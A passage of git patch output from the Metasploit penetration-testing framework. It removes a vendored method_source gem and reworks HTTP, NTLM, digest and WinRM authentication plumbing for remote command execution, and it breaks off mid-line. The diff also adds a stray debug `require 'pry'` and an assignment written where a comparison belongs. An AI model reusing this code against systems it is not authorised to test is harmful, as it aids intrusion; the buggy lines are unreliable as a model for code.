1.9 and above) - # @return [String] The method sourcecode as a string - # @example - # Set.instance_method(:clear).source.display - # => - # def clear - # @hash.clear - # self - # end - def source - if respond_to?(:source_location) - source = MethodSource.source_helper(source_location) - - raise "Cannot locate source for this method: #{name}" if !source - else - raise "#{self.class}#source not supported by this Ruby version (#{RUBY_VERSION})" - end - - source - end - - # Return the comments associated with the method as a string. - # (This functionality is only supported in Ruby 1.9 and above) - # @return [String] The method's comments as a string - # @example - # Set.instance_method(:clear).comment.display - # => - # # Removes all elements and returns self. - def comment - if respond_to?(:source_location) - comment = MethodSource.comment_helper(source_location) - - raise "Cannot locate source for this method: #{name}" if !comment - else - raise "#{self.class}#comment not supported by this Ruby version (#{RUBY_VERSION})" - end - - comment - end - end -end - -class Method - include MethodSource::SourceLocation::MethodExtensions - include MethodSource::MethodExtensions -end - -class UnboundMethod - include MethodSource::SourceLocation::UnboundMethodExtensions - include MethodSource::MethodExtensions -end - -class Proc - include MethodSource::SourceLocation::ProcExtensions - include MethodSource::MethodExtensions -end - diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source/source_location.rb b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source/source_location.rb deleted file mode 100644 index 9161854819..0000000000 --- a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source/source_location.rb +++ /dev/null @@ -1,138 +0,0 @@ -module MethodSource - module ReeSourceLocation - # Ruby enterprise edition provides all the information that's - # needed, in a slightly different way. - def source_location - [__file__, __line__] rescue nil - end - end - - module SourceLocation - module MethodExtensions - if Proc.method_defined? :__file__ - include ReeSourceLocation - - elsif defined?(RUBY_ENGINE) && RUBY_ENGINE =~ /jruby/ - require 'java' - - # JRuby version source_location hack - # @return [Array] A two element array containing the source location of the method - def source_location - to_java.source_location(Thread.current.to_java.getContext()) - end - else - - - def trace_func(event, file, line, id, binding, classname) - return unless event == 'call' - set_trace_func nil - - @file, @line = file, line - raise :found - end - - private :trace_func - - # Return the source location of a method for Ruby 1.8. - # @return [Array] A two element array. First element is the - # file, second element is the line in the file where the - # method definition is found. - def source_location - if @file.nil? - args =[*(1..(arity<-1 ? -arity-1 : arity ))] - - set_trace_func method(:trace_func).to_proc - call(*args) rescue nil - set_trace_func nil - @file = File.expand_path(@file) if @file && File.exist?(File.expand_path(@file)) - end - return [@file, @line] if File.exist?(@file.to_s) - end - end - end - - module ProcExtensions - if Proc.method_defined? :__file__ - include ReeSourceLocation - - elsif defined?(RUBY_ENGINE) && RUBY_ENGINE =~ /rbx/ - - # Return the source location for a Proc (Rubinius only) - # @return [Array] A two element array. First element is the - # file, second element is the line in the file where the - # proc definition is found. - def source_location - [block.file.to_s, block.line] - end - else - - # Return the source location for a Proc (in implementations - # without Proc#source_location) - # @return [Array] A two element array. First element is the - # file, second element is the line in the file where the - # proc definition is found. - def source_location - self.to_s =~ /@(.*):(\d+)/ - [$1, $2.to_i] - end - end - end - - module UnboundMethodExtensions - if Proc.method_defined? :__file__ - include ReeSourceLocation - - elsif defined?(RUBY_ENGINE) && RUBY_ENGINE =~ /jruby/ - require 'java' - - # JRuby version source_location hack - # @return [Array] A two element array containing the source location of the method - def source_location - to_java.source_location(Thread.current.to_java.getContext()) - end - - else - - - # Return the source location of an instance method for Ruby 1.8. - # @return [Array] A two element array. First element is the - # file, second element is the line in the file where the - # method definition is found. - def source_location - klass = case owner - when Class - owner - when Module - method_owner = owner - Class.new { include(method_owner) } - end - - # deal with immediate values - case - when klass == Symbol - return :a.method(name).source_location - when klass == Fixnum - return 0.method(name).source_location - when klass == TrueClass - return true.method(name).source_location - when klass == FalseClass - return false.method(name).source_location - when klass == NilClass - return nil.method(name).source_location - end - - begin - Object.instance_method(:method).bind(klass.allocate).call(name).source_location - rescue TypeError - - # Assume we are dealing with a Singleton Class: - # 1. Get the instance object - # 2. Forward the source_location lookup to the instance - instance ||= ObjectSpace.each_object(owner).first - Object.instance_method(:method).bind(instance).call(name).source_location - end - end - end - end - end -end diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source/version.rb b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source/version.rb deleted file mode 100644 index b8142bfaef..0000000000 --- a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source/version.rb +++ /dev/null @@ -1,3 +0,0 @@ -module MethodSource - VERSION = "0.7.1" -end diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/method_source.gemspec b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/method_source.gemspec deleted file mode 100644 index 83a727d6f6..0000000000 --- a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/method_source.gemspec +++ /dev/null @@ -1,33 +0,0 @@ -# -*- encoding: utf-8 -*- - -Gem::Specification.new do |s| - s.name = "method_source" - s.version = "0.7.0" - - s.required_rubygems_version = Gem::Requirement.new(">= 0") if s.respond_to? :required_rubygems_version= - s.authors = ["John Mair (banisterfiend)"] - s.date = "2012-01-01" - s.description = "retrieve the sourcecode for a method" - s.email = "jrmair@gmail.com" - s.files = [".gemtest", ".travis.yml", ".yardopts", "Gemfile", "LICENSE", "README.markdown", "Rakefile", "lib/method_source.rb", "lib/method_source/source_location.rb", "lib/method_source/version.rb", "method_source.gemspec", "test/test.rb", "test/test_helper.rb"] - s.homepage = "http://banisterfiend.wordpress.com" - s.require_paths = ["lib"] - s.rubygems_version = "1.8.10" - s.summary = "retrieve the sourcecode for a method" - s.test_files = ["test/test.rb", "test/test_helper.rb"] - - if s.respond_to? :specification_version then - s.specification_version = 3 - - if Gem::Version.new(Gem::VERSION) >= Gem::Version.new('1.2.0') then - s.add_development_dependency(%q, ["~> 1.1.0"]) - s.add_development_dependency(%q, ["~> 0.9"]) - else - s.add_dependency(%q, ["~> 1.1.0"]) - s.add_dependency(%q, ["~> 0.9"]) - end - else - s.add_dependency(%q, ["~> 1.1.0"]) - s.add_dependency(%q, ["~> 0.9"]) - end -end diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/test/test.rb b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/test/test.rb deleted file mode 100644 index 425e56acf9..0000000000 --- a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/test/test.rb +++ /dev/null @@ -1,122 +0,0 @@ -direc = File.dirname(__FILE__) - -require 'rubygems' -require 'bacon' -require "#{direc}/../lib/method_source" -require "#{direc}/test_helper" - -describe MethodSource do - - describe "source_location (testing 1.8 implementation)" do - it 'should return correct source_location for a method' do - method(:hello).source_location.first.should =~ /test_helper/ - end - - it 'should not raise for immediate instance methods' do - [Symbol, Fixnum, TrueClass, FalseClass, NilClass].each do |immediate_class| - lambda { immediate_class.instance_method(:to_s).source_location }.should.not.raise - end - end - - it 'should not raise for immediate methods' do - [:a, 1, true, false, nil].each do |immediate| - lambda { immediate.method(:to_s).source_location }.should.not.raise - end - end - end - - before do - @hello_module_source = " def hello; :hello_module; end\n" - @hello_singleton_source = "def $o.hello; :hello_singleton; end\n" - @hello_source = "def hello; :hello; end\n" - @hello_comment = "# A comment for hello\n# It spans two lines and is indented by 2 spaces\n" - @lambda_comment = "# This is a comment for MyLambda\n" - @lambda_source = "MyLambda = lambda { :lambda }\n" - @proc_source = "MyProc = Proc.new { :proc }\n" - end - - it 'should define methods on Method and UnboundMethod and Proc' do - Method.method_defined?(:source).should == true - UnboundMethod.method_defined?(:source).should == true - Proc.method_defined?(:source).should == true - end - - describe "Methods" do - it 'should return source for method' do - method(:hello).source.should == @hello_source - end - - it 'should return source for a method defined in a module' do - M.instance_method(:hello).source.should == @hello_module_source - end - - it 'should return source for a singleton method as an instance method' do - class << $o; self; end.instance_method(:hello).source.should == @hello_singleton_source - end - - it 'should return source for a singleton method' do - $o.method(:hello).source.should == @hello_singleton_source - end - - - it 'should return a comment for method' do - method(:hello).comment.should == @hello_comment - end - - - if !is_rbx? - it 'should raise for C methods' do - lambda { method(:puts).source }.should.raise RuntimeError - end - end - end - - # if RUBY_VERSION =~ /1.9/ || is_rbx? - describe "Lambdas and Procs" do - it 'should return source for proc' do - MyProc.source.should == @proc_source - end - - it 'should return an empty string if there is no comment' do - MyProc.comment.should == '' - end - - it 'should return source for lambda' do - MyLambda.source.should == @lambda_source - end - - it 'should return comment for lambda' do - MyLambda.comment.should == @lambda_comment - end - end - # end - describe "Comment tests" do - before do - @comment1 = "# a\n# b\n" - @comment2 = "# a\n# b\n" - @comment3 = "# a\n#\n# b\n" - @comment4 = "# a\n# b\n" - @comment5 = "# a\n# b\n# c\n# d\n" - end - - it "should correctly extract multi-line comments" do - method(:comment_test1).comment.should == @comment1 - end - - it "should correctly strip leading whitespace before comments" do - method(:comment_test2).comment.should == @comment2 - end - - it "should keep empty comment lines" do - method(:comment_test3).comment.should == @comment3 - end - - it "should ignore blank lines between comments" do - method(:comment_test4).comment.should == @comment4 - end - - it "should align all comments to same indent level" do - method(:comment_test5).comment.should == @comment5 - end - end -end diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/test/test_helper.rb b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/test/test_helper.rb deleted file mode 100644 index 53da4e519c..0000000000 --- a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/test/test_helper.rb +++ /dev/null @@ -1,50 +0,0 @@ -def is_rbx? - defined?(RUBY_ENGINE) && RUBY_ENGINE =~ /rbx/ -end - -def jruby? - defined?(RUBY_ENGINE) && RUBY_ENGINE =~ /jruby/ -end - - -module M - def hello; :hello_module; end -end - -$o = Object.new -def $o.hello; :hello_singleton; end - -# A comment for hello - - # It spans two lines and is indented by 2 spaces -def hello; :hello; end - -# a -# b -def comment_test1; end - - # a - # b -def comment_test2; end - -# a -# -# b -def comment_test3; end - -# a - -# b -def comment_test4; end - - -# a - # b - # c -# d -def comment_test5; end - -# This is a comment for MyLambda -MyLambda = lambda { :lambda } -MyProc = Proc.new { :proc } - diff --git a/lib/msf/core/auxiliary/crawler.rb b/lib/msf/core/auxiliary/crawler.rb index 36e963ecbc..168a130d5b 100644 --- a/lib/msf/core/auxiliary/crawler.rb +++ b/lib/msf/core/auxiliary/crawler.rb @@ -22,7 +22,9 @@ module Auxiliary::HttpCrawler Opt::Proxies, OptInt.new('MAX_PAGES', [ true, 'The maximum number of pages to crawl per URL', 500]), OptInt.new('MAX_MINUTES', [ true, 'The maximum number of minutes to spend on each URL', 5]), - OptInt.new('MAX_THREADS', [ true, 'The maximum number of concurrent requests', 4]) + OptInt.new('MAX_THREADS', [ true, 'The maximum number of concurrent requests', 4]), + OptString.new('USERNAME', [false, 'The HTTP username to specify for authentication']), + OptString.new('PASSWORD', [false, 'The HTTP password to specify for authentication']) ], self.class ) @@ -118,8 +120,9 @@ module Auxiliary::HttpCrawler :info => "" }) - if datastore['BasicAuthUser'] - t[:http_basic_auth] = [ "#{datastore['BasicAuthUser']}:#{datastore['BasicAuthPass']}" ].pack("m*").gsub(/\s+/, '') + if datastore['USERNAME'] and datastore['USERNAME'] != '' + t[:username] = datastore['USERNAME'].to_s + t[:password] = datastore['PASSWORD'].to_s end if datastore['HTTPCookie'] @@ -278,9 +281,8 @@ module Auxiliary::HttpCrawler opts[:cookies] = t[:cookies] end - if t[:http_basic_auth] - opts[:http_basic_auth] = t[:http_basic_auth] - end + opts[:username] = t[:username] || '' + opts[:password] =t[:password] || '' opts end diff --git a/lib/msf/core/auxiliary/web/http.rb b/lib/msf/core/auxiliary/web/http.rb index a7c8fc86e3..2ad3dbcb19 100644 --- a/lib/msf/core/auxiliary/web/http.rb +++ b/lib/msf/core/auxiliary/web/http.rb @@ -69,6 +69,7 @@ class Auxiliary::Web::HTTP attr_reader :framework attr_accessor :redirect_limit + attr_accessor :username , :password def initialize( opts = {} ) @opts = opts.dup @@ -84,8 +85,8 @@ class Auxiliary::Web::HTTP @request_opts = {} if opts[:auth].is_a? Hash - @request_opts['basic_auth'] = [ opts[:auth][:user].to_s + ':' + - opts[:auth][:password] ]. pack( 'm*' ).gsub( /\s+/, '' ) + @username = opts[:auth][:user].to_s + @password = opts[:auth][:password].to_s end self.redirect_limit = opts[:redirect_limit] || 20 @@ -105,7 +106,9 @@ class Auxiliary::Web::HTTP opts[:target].port, {}, opts[:target].ssl, - 'SSLv23' + 'SSLv23', + username, + password ) c.set_config({ @@ -296,6 +299,10 @@ class Auxiliary::Web::HTTP opts['data'] = body if body c = connect + if opts['username'] and opts['username'] != '' + c.username = opts['username'].to_s + c.password = opts['password'].to_s + end Response.from_rex_response c.send_recv( c.request_cgi( opts ), timeout ) rescue ::Timeout::Error Response.timed_out diff --git a/lib/msf/core/exploit/http/client.rb b/lib/msf/core/exploit/http/client.rb index 6d0bd9336b..5d8a48891e 100644 --- a/lib/msf/core/exploit/http/client.rb +++ b/lib/msf/core/exploit/http/client.rb @@ -46,10 +46,8 @@ module Exploit::Remote::HttpClient OptString.new('UserAgent', [false, 'The User-Agent header to use for all requests', Rex::Proto::Http::Client::DefaultUserAgent ]), - OptString.new('BasicAuthUser', [false, 'The HTTP username to specify for basic authentication']), - OptString.new('BasicAuthPass', [false, 'The HTTP password to specify for basic authentication']), - OptString.new('DigestAuthUser', [false, 'The HTTP username to specify for digest authentication']), - OptString.new('DigestAuthPassword', [false, 'The HTTP password to specify for digest authentication']), + OptString.new('USERNAME', [false, 'The HTTP username to specify for authentication', '']), + OptString.new('PASSWORD', [false, 'The HTTP password to specify for authentication', '']), OptBool.new('DigestAuthIIS', [false, 'Conform to IIS, should work for most servers. Only set to false for non-IIS servers', true]), OptBool.new('SSL', [ false, 'Negotiate SSL for outgoing connections', false]), OptEnum.new('SSLVersion', [ false, 'Specify the version of SSL that should be used', 'SSL3', ['SSL2', 'SSL3', 'TLS1']]), @@ -156,7 +154,9 @@ module Exploit::Remote::HttpClient }, dossl, ssl_version, - proxies + proxies, + datastore['USERNAME'], + datastore['PASSWORD'] ) # Configure the HTTP client with the supplied parameter @@ -184,7 +184,15 @@ module Exploit::Remote::HttpClient 'pad_post_params_count' => datastore['HTTP::pad_post_params_count'], 'uri_fake_end' => datastore['HTTP::uri_fake_end'], 'uri_fake_params_start' => datastore['HTTP::uri_fake_params_start'], - 'header_folding' => datastore['HTTP::header_folding'] + 'header_folding' => datastore['HTTP::header_folding'], + 'usentlm2_session' => datastore['NTLM::UseNTLM2_session'], + 'use_ntlmv2' => datastore['NTLM::UseNTLMv2'], + 'send_lm' => datastore['NTLM::SendLM'], + 'send_ntlm' => datastore['NTLM::SendNTLM'], + 'SendSPN' => datastore['NTLM::SendSPN'], + 'UseLMKey' => datastore['NTLM::UseLMKey'], + 'domain' => datastore['DOMAIN'], + 'DigestAuthIIS' => datastore['DigestAuthIIS'] ) # If this connection is global, persist it @@ -251,6 +259,10 @@ module Exploit::Remote::HttpClient def send_request_raw(opts={}, timeout = 20) begin c = connect(opts) + if opts['username'] and opts['username'] != '' + c.username = opts['username'].to_s + c.password = opts['password'].to_s + end r = c.request_raw(opts) c.send_recv(r, opts[:timeout] ? opts[:timeout] : timeout) rescue ::Errno::EPIPE, ::Timeout::Error @@ -266,6 +278,10 @@ module Exploit::Remote::HttpClient def send_request_cgi(opts={}, timeout = 20) begin c = connect(opts) + if opts['username'] and opts['username'] != '' + c.username = opts['username'].to_s + c.password = opts['password'].to_s + end r = c.request_cgi(opts) c.send_recv(r, opts[:timeout] ? opts[:timeout] : timeout) rescue ::Errno::EPIPE, ::Timeout::Error @@ -277,241 +293,8 @@ module Exploit::Remote::HttpClient # Combine the user/pass into an auth string for the HTTP Client # def basic_auth - return if not datastore['BasicAuthUser'] - datastore['BasicAuthUser'] + ":" + (datastore['BasicAuthPass'] || '') - end - - # - # Connect to the server, and perform NTLM authentication for this session. - # Note the return value is [resp,c], so the caller can have access to both - # the last response, and the connection itself -- this is important since - # NTLM auth is bound to this particular TCP session. - # - # TODO: Fix up error messaging a lot more -- right now it's pretty hard - # to tell what all went wrong. - # - def send_http_auth_ntlm(opts={}, timeout = 20) - #ntlm_message_1 = "NTLM TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA=" - ntlm_options = { - :signing => false, - :usentlm2_session => datastore['NTLM::UseNTLM2_session'], - :use_ntlmv2 => datastore['NTLM::UseNTLMv2'], - :send_lm => datastore['NTLM::SendLM'], - :send_ntlm => datastore['NTLM::SendNTLM'] - } - - ntlmssp_flags = NTLM_UTILS.make_ntlm_flags(ntlm_options) - workstation_name = Rex::Text.rand_text_alpha(rand(8)+1) - domain_name = datastore['DOMAIN'] - - ntlm_message_1 = "NTLM " + Rex::Text::encode_base64(NTLM_UTILS::make_ntlmssp_blob_init( domain_name, - workstation_name, - ntlmssp_flags)) - to = opts[:timeout] || timeout - begin - c = connect(opts) - - # First request to get the challenge - r = c.request_cgi(opts.merge({ - 'uri' => opts['uri'], - 'method' => 'GET', - 'headers' => { 'Authorization' => ntlm_message_1 }})) - resp = c.send_recv(r, to) - unless resp.kind_of? Rex::Proto::Http::Response - return [nil,nil] - end - return [nil,nil] if resp.code == 404 - return [nil,nil] unless resp.code == 401 && resp.headers['WWW-Authenticate'] - - # Get the challenge and craft the response - ntlm_challenge = resp.headers['WWW-Authenticate'].match(/NTLM ([A-Z0-9\x2b\x2f=]+)/i)[1] - return [nil,nil] unless ntlm_challenge - - - #old and simplier method but not compatible with windows 7/2008r2 - #ntlm_message_2 = Rex::Proto::NTLM::Message.decode64(ntlm_challenge) - #ntlm_message_3 = ntlm_message_2.response( {:user => opts['username'],:password => opts['password']}, {:ntlmv2 => true}) - - ntlm_message_2 = Rex::Text::decode_base64(ntlm_challenge) - blob_data = NTLM_UTILS.parse_ntlm_type_2_blob(ntlm_message_2) - - challenge_key = blob_data[:challenge_key] - server_ntlmssp_flags = blob_data[:server_ntlmssp_flags] #else should raise an error - #netbios name - default_name = blob_data[:default_name] || '' - #netbios domain - default_domain = blob_data[:default_domain] || '' - #dns name - dns_host_name = blob_data[:dns_host_name] || '' - #dns domain - dns_domain_name = blob_data[:dns_domain_name] || '' - #Client time - chall_MsvAvTimestamp = blob_data[:chall_MsvAvTimestamp] || '' - - spnopt = {:use_spn => datastore['NTLM::SendSPN'], :name => self.rhost} - - resp_lm, - resp_ntlm, - client_challenge, - ntlm_cli_challenge = NTLM_UTILS.create_lm_ntlm_responses(opts['username'], opts['password'], challenge_key, - domain_name, default_name, default_domain, - dns_host_name, dns_domain_name, chall_MsvAvTimestamp, - spnopt, ntlm_options) - - ntlm_message_3 = NTLM_UTILS.make_ntlmssp_blob_auth(domain_name, workstation_name, opts['username'], - resp_lm, resp_ntlm, '', ntlmssp_flags) - ntlm_message_3 = Rex::Text::encode_base64(ntlm_message_3) - - # Send the response - r = c.request_cgi(opts.merge({ - 'uri' => opts['uri'], - 'method' => 'GET', - 'headers' => { 'Authorization' => "NTLM #{ntlm_message_3}"}})) - resp = c.send_recv(r, to, true) - unless resp.kind_of? Rex::Proto::Http::Response - return [nil,nil] - end - return [nil,nil] if resp.code == 404 - return [resp,c] - - rescue ::Errno::EPIPE, ::Timeout::Error - end - end - - def send_digest_request_cgi(opts={}, timeout=20) - @nonce_count = 0 - - return [nil,nil] if not (datastore['DigestAuthUser'] or opts['DigestAuthUser']) - to = opts['timeout'] || timeout - - digest_user = datastore['DigestAuthUser'] || opts['DigestAuthUser'] || "" - digest_password = datastore['DigestAuthPassword'] || opts['DigestAuthPassword'] || "" - - method = opts['method'] - path = opts['uri'] - iis = true - if (opts['DigestAuthIIS'] == false or datastore['DigestAuthIIS'] == false) - iis = false - end - - begin - @nonce_count += 1 - - resp = opts['response'] - - if not resp - # Get authentication-challenge from server, and read out parameters required - c = connect(opts) - r = c.request_cgi(opts.merge({ - 'uri' => path, - 'method' => method })) - resp = c.send_recv(r, to) - unless resp.kind_of? Rex::Proto::Http::Response - return [nil,nil] - end - return [nil,nil] if resp.code == 404 - if resp.code != 401 - return resp - end - return [nil,nil] unless resp.headers['WWW-Authenticate'] - end - - # Don't anchor this regex to the beginning of string because header - # folding makes it appear later when the server presents multiple - # WWW-Authentication options (such as is the case with IIS configured - # for Digest or NTLM). - resp['www-authenticate'] =~ /Digest (.*)/ - - parameters = {} - $1.split(/,[[:space:]]*/).each do |p| - k, v = p.split("=", 2) - parameters[k] = v.gsub('"', '') - end - - qop = parameters['qop'] - - if parameters['algorithm'] =~ /(.*?)(-sess)?$/ - algorithm = case $1 - when 'MD5' then Digest::MD5 - when 'SHA1' then Digest::SHA1 - when 'SHA2' then Digest::SHA2 - when 'SHA256' then Digest::SHA256 - when 'SHA384' then Digest::SHA384 - when 'SHA512' then Digest::SHA512 - when 'RMD160' then Digest::RMD160 - else raise Error, "unknown algorithm \"#{$1}\"" - end - algstr = parameters["algorithm"] - sess = $2 - else - algorithm = Digest::MD5 - algstr = "MD5" - sess = false - end - - a1 = if sess then - [ - algorithm.hexdigest("#{digest_user}:#{parameters['realm']}:#{digest_password}"), - parameters['nonce'], - @cnonce - ].join ':' - else - "#{digest_user}:#{parameters['realm']}:#{digest_password}" - end - - ha1 = algorithm.hexdigest(a1) - ha2 = algorithm.hexdigest("#{method}:#{path}") - - request_digest = [ha1, parameters['nonce']] - request_digest.push(('%08x' % @nonce_count), @cnonce, qop) if qop - request_digest << ha2 - request_digest = request_digest.join ':' - - # Same order as IE7 - auth = [ - "Digest username=\"#{digest_user}\"", - "realm=\"#{parameters['realm']}\"", - "nonce=\"#{parameters['nonce']}\"", - "uri=\"#{path}\"", - "cnonce=\"#{@cnonce}\"", - "nc=#{'%08x' % @nonce_count}", - "algorithm=#{algstr}", - "response=\"#{algorithm.hexdigest(request_digest)[0, 32]}\"", - # The spec says the qop value shouldn't be enclosed in quotes, but - # some versions of IIS require it and Apache accepts it. Chrome - # and Firefox both send it without quotes but IE does it this way. - # Use the non-compliant-but-everybody-does-it to be as compatible - # as possible by default. The user can override if they don't like - # it. - if qop.nil? then - elsif iis then - "qop=\"#{qop}\"" - else - "qop=#{qop}" - end, - if parameters.key? 'opaque' then - "opaque=\"#{parameters['opaque']}\"" - end - ].compact - - headers ={ 'Authorization' => auth.join(', ') } - headers.merge!(opts['headers']) if opts['headers'] - - - # Send main request with authentication - r = c.request_cgi(opts.merge({ - 'uri' => path, - 'method' => method, - 'headers' => headers })) - resp = c.send_recv(r, to) - unless resp.kind_of? Rex::Proto::Http::Response - return [nil,nil] - end - - return [resp,c] - - rescue ::Errno::EPIPE, ::Timeout::Error - end + return if not datastore['USERNAME'] + datastore['USERNAME'].to_s + ":" + (datastore['PASSWORD'].to_s || '') end ## diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index 46bfffcc86..ba46142a45 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -8,6 +8,8 @@ require 'rex/proto/ntlm/constants' require 'rex/proto/ntlm/utils' require 'rex/proto/ntlm/exceptions' +require 'pry' + module Rex module Proto module Http @@ -294,7 +296,7 @@ class Client # def send_recv(req, t = -1, persist=false) res = _send_recv(req,t,persist) - if res and res.code == 401 and res.headers['WWW-Authenticate'] and have_creds? + if res and res.code == 401 and res.headers['WWW-Authenticate'] res = send_auth(res, req.opts, t, persist) end res @@ -329,11 +331,6 @@ class Client conn.put(req.to_s) end - # Validates that the client has creds - def have_creds? - !(self.username.nil?) && self.username != '' - end - # Resends an HTTP Request with the propper authentcation headers # set. If we do not support the authentication type the server requires # we return the original response object @@ -343,8 +340,23 @@ class Client # @param persist [Boolean] whether or not to persist the TCP connection (pipelining) # @return [Response] the last valid HTTP response object we received def send_auth(res, opts, t, persist) - opts['username'] ||= self.username - opts['password'] ||= self.password + if opts['username'].nil? or opts['username'] == '' + if self.username and not (self.username == '') + opts['username'] = self.username + else + opts['username'] = nil + end + end + + if opts['password'].nil? or opts['password'] == '' + if self.password and not (self.password == '') + opts['password'] = self.password + else + opts['password'] = nil + end + end + + return res if opts['username'].nil? or opts['username'] = '' supported_auths = res.headers['WWW-Authenticate'] if supported_auths.include? 'Basic' if opts['headers'] From ac6fdf24a28184531ae5c90a09ce251258f30416 Mon Sep 17 00:00:00 2001 From: David Maloney Date: Tue, 19 Feb 2013 22:01:43 -0600 Subject: [PATCH 21/87] Fix winrm mixin from revert merge --- lib/msf/core/exploit/winrm.rb | 117 ++++++---------------------------- 1 file changed, 20 insertions(+), 97 deletions(-) diff --git a/lib/msf/core/exploit/winrm.rb b/lib/msf/core/exploit/winrm.rb index 72b6a1f724..e61a29e5aa 100644 --- a/lib/msf/core/exploit/winrm.rb +++ b/lib/msf/core/exploit/winrm.rb @@ -42,7 +42,7 @@ module Exploit::Remote::WinRM c = connect(opts) to = opts[:timeout] || timeout ctype = "application/soap+xml;charset=UTF-8" - resp, c = send_request_cgi(opts.merge({ + resp = send_winrm_request(opts.merge({ 'uri' => opts['uri'], 'method' => 'POST', 'ctype' => ctype, @@ -61,7 +61,7 @@ module Exploit::Remote::WinRM end def winrm_run_cmd(cmd, timeout=20) - resp,c = send_request_ntlm(winrm_open_shell_msg,timeout) + resp = send_winrm_request(winrm_open_shell_msg,timeout) if resp.nil? print_error "Recieved no reply from server" return nil @@ -76,17 +76,17 @@ module Exploit::Remote::WinRM return retval end shell_id = winrm_get_shell_id(resp) - resp,c = send_request_ntlm(winrm_cmd_msg(cmd, shell_id),timeout) + resp = send_winrm_request(winrm_cmd_msg(cmd, shell_id),timeout) cmd_id = winrm_get_cmd_id(resp) - resp,c = send_request_ntlm(winrm_cmd_recv_msg(shell_id,cmd_id),timeout) + resp = send_winrm_request(winrm_cmd_recv_msg(shell_id,cmd_id),timeout) streams = winrm_get_cmd_streams(resp) - resp,c = send_request_ntlm(winrm_terminate_cmd_msg(shell_id,cmd_id),timeout) - resp,c = send_request_ntlm(winrm_delete_shell_msg(shell_id)) + resp = send_winrm_request(winrm_terminate_cmd_msg(shell_id,cmd_id),timeout) + resp = send_winrm_request(winrm_delete_shell_msg(shell_id)) return streams end def winrm_run_cmd_hanging(cmd, timeout=20) - resp,c = send_request_ntlm(winrm_open_shell_msg,timeout) + resp = send_winrm_request(winrm_open_shell_msg,timeout) if resp.nil? print_error "Recieved no reply from server" return nil @@ -101,9 +101,9 @@ module Exploit::Remote::WinRM return retval end shell_id = winrm_get_shell_id(resp) - resp,c = send_request_ntlm(winrm_cmd_msg(cmd, shell_id),timeout) + resp = send_winrm_request(winrm_cmd_msg(cmd, shell_id),timeout) cmd_id = winrm_get_cmd_id(resp) - resp,c = send_request_ntlm(winrm_cmd_recv_msg(shell_id,cmd_id),timeout) + resp = send_winrm_request(winrm_cmd_recv_msg(shell_id,cmd_id),timeout) streams = winrm_get_cmd_streams(resp) return streams end @@ -219,94 +219,6 @@ module Exploit::Remote::WinRM ::Rex::Proto::DCERPC::UUID.uuid_unpack(Rex::Text.rand_text(16)) end - def send_request_ntlm(data, timeout = 20) - opts = { - 'uri' => datastore['URI'], - 'data' => data, - 'username' => datastore['USERNAME'], - 'password' => datastore['PASSWORD'] - } - ntlm_options = { - :signing => false, - :usentlm2_session => datastore['NTLM::UseNTLM2_session'], - :use_ntlmv2 => datastore['NTLM::UseNTLMv2'], - :send_lm => datastore['NTLM::SendLM'], - :send_ntlm => datastore['NTLM::SendNTLM'] - } - ntlmssp_flags = NTLM_UTILS.make_ntlm_flags(ntlm_options) - workstation_name = Rex::Text.rand_text_alpha(rand(8)+1) - domain_name = datastore['DOMAIN'] - ntlm_message_1 = "NEGOTIATE " + Rex::Text::encode_base64(NTLM_UTILS::make_ntlmssp_blob_init( domain_name, - workstation_name, - ntlmssp_flags)) - to = opts[:timeout] || timeout - begin - c = connect(opts) - ctype = "application/soap+xml;charset=UTF-8" - # First request to get the challenge - r = c.request_cgi(opts.merge({ - 'uri' => opts['uri'], - 'method' => 'POST', - 'ctype' => ctype, - 'headers' => { 'Authorization' => ntlm_message_1}, - 'data' => opts['data'] - })) - resp = c.send_recv(r, to) - unless resp.kind_of? Rex::Proto::Http::Response - return [nil,nil] - end - return [nil,nil] if resp.code == 404 - return [nil,nil] unless resp.code == 401 && resp.headers['WWW-Authenticate'] - # Get the challenge and craft the response - ntlm_challenge = resp.headers['WWW-Authenticate'].match(/NEGOTIATE ([A-Z0-9\x2b\x2f=]+)/i)[1] - return [nil,nil] unless ntlm_challenge - - #old and simplier method but not compatible with windows 7/2008r2 - #ntlm_message_2 = Rex::Proto::NTLM::Message.decode64(ntlm_challenge) - #ntlm_message_3 = ntlm_message_2.response( {:user => opts['username'],:password => opts['password']}, {:ntlmv2 => true}) - ntlm_message_2 = Rex::Text::decode_base64(ntlm_challenge) - blob_data = NTLM_UTILS.parse_ntlm_type_2_blob(ntlm_message_2) - challenge_key = blob_data[:challenge_key] - server_ntlmssp_flags = blob_data[:server_ntlmssp_flags] #else should raise an error - #netbios name - default_name = blob_data[:default_name] || '' - #netbios domain - default_domain = blob_data[:default_domain] || '' - #dns name - dns_host_name = blob_data[:dns_host_name] || '' - #dns domain - dns_domain_name = blob_data[:dns_domain_name] || '' - #Client time - chall_MsvAvTimestamp = blob_data[:chall_MsvAvTimestamp] || '' - spnopt = {:use_spn => datastore['NTLM::SendSPN'], :name => self.rhost} - resp_lm, - resp_ntlm, - client_challenge, - ntlm_cli_challenge = NTLM_UTILS.create_lm_ntlm_responses(opts['username'], opts['password'], challenge_key, - domain_name, default_name, default_domain, - dns_host_name, dns_domain_name, chall_MsvAvTimestamp, - spnopt, ntlm_options) - ntlm_message_3 = NTLM_UTILS.make_ntlmssp_blob_auth(domain_name, workstation_name, opts['username'], - resp_lm, resp_ntlm, '', ntlmssp_flags) - ntlm_message_3 = 